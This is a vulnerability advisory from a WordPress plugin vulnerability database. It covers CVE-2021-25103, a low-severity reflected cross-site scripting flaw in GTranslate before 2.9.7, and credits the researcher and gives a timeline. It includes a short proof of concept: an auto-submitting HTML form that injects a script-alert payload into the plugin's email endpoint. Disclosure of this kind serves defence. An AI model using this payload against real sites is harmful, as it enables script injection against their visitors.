WordPress Plugin Vulnerabilities

GTranslate < 2.9.7 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the body parameter in the url_addon/gtranslate-email.php file before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue. Note: exploitation of the issue requires knowledge of the NONCE_SALT and NONCE_KEY

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-content/plugins/gtranslate/url_addon/gtranslate-email.php?glang=e1n" id="hack" method="POST">
      <input type="hidden" name="body" value="<script>alert(/XSS/)</script>" />
      <input type="hidden" name="access_key" value="b4a0efbacac60a7d20cb891f5d656a3f" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

Plugin icon
gtranslate
Fixed in 2.9.7

References

CVE
CVE-2021-25103

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
3.4 (low)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified
Yes
WPVDB ID
90067336-c039-4cbe-aa9f-5eab5d1e1c3d

Timeline

Publicly Published
2022-01-10 (about 2 years ago)
Added
2022-01-10 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2021-07-26
Title
GiveWP < 2.12.0 - Admin+ Stored XSS
Published
2024-03-07
Title
Pz-LinkCard < 2.5.3 - Admin+ Stored XSS
Published
2023-06-15
Title
MasterStudy LMS < 3.0.9 - Contributor+ Stored XSS
Published
2024-03-25
Title
WP Directory Kit < 1.3.0 - Reflected Cross-Site Scripting
Published
2022-03-14
Title
Dropdown Menu Widget <= 1.9.7 - Subscriber+ Arbitrary Settings Update to Stored XSS